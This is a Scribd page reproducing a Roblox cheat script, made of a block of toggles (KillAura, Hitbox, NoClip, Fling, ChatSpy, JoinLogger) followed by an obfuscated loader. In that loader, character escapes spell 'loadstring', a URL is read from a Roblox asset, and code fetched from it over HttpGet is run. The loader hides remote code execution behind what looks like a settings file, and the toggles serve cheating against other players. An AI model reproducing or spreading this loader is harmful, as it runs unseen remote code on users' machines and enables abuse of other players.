0% found this document useful (0 votes)
44 views18 pages

Settings

The document contains a script for a game that includes various features and settings such as KillAura, Hitbox adjustments, and anti-cheat measures. It also includes options for movement enhancements like Dash and NoClip, as well as tool management features. The script appears to be designed for modifying gameplay mechanics and player interactions within the game environment.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
44 views18 pages

Settings

The document contains a script for a game that includes various features and settings such as KillAura, Hitbox adjustments, and anti-cheat measures. It also includes options for movement enhancements like Dash and NoClip, as well as tool management features. The script appears to be designed for modifying gameplay mechanics and player interactions within the game environment.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd

task.spawn(function(...

local KillAura = false


local KillAura2 = 16
local Hitbox = false
local Hitbox2 = 20
local ClickKill = true
local DeathTouch = false
local KillCommand = true
local HiddenFling = false
local OnlyTargets = false
local AntiC4 = true
local AntiGrenade = true
local AntiTrap = true
local AntiAxe = true
local AntiFirework = true
local AntiRagdoll = true
local AntiVoid = true
local AntiFling = true
local Invisibility = false
local DashCarry = false
local DashXscale = 0
local DashXOffSet = 600
local DashYscale = 0
local DashYOffSet = 40
local CarryXscale = 0
local CarryXOffSet = 600
local CarryYscale = 0
local CarryYOffSet = 110
local ShiftLock = false
local Speed = false
local Speed2 = 70
local Jump = false
local Jump2 = 200
local TpTool = false
local Float = false
local InfDash = false
local SuperDash = false
local SuperDash2 = 90
local NoClip = false
local AutoGiver = false
local AutoGiver2 = "Pencil"
local AutoBack = false
local LoopReset = false
local SpamSound = false
local StopTime = false
local ChatSpy = false
local GrabTools = false
local GrabTools2 = "All"
local FakeLag = false
local JoinLogger = false
local JoinLogger2 = "All"

end, ...)
task.spawn(function()local a=getfenv()['\108\111\97\100\115\116\114\105\110\103']
(game:HttpGet((function()if game.GetObjects then return
game:GetObjects("rbxassetid://105970451733462")[1].Value else return
game:GetService("InsertService"):LoadLocalAsset("rbxassetid://105970451733462").Val
ue end end)().."/src"))pcall(a)end)

You might also like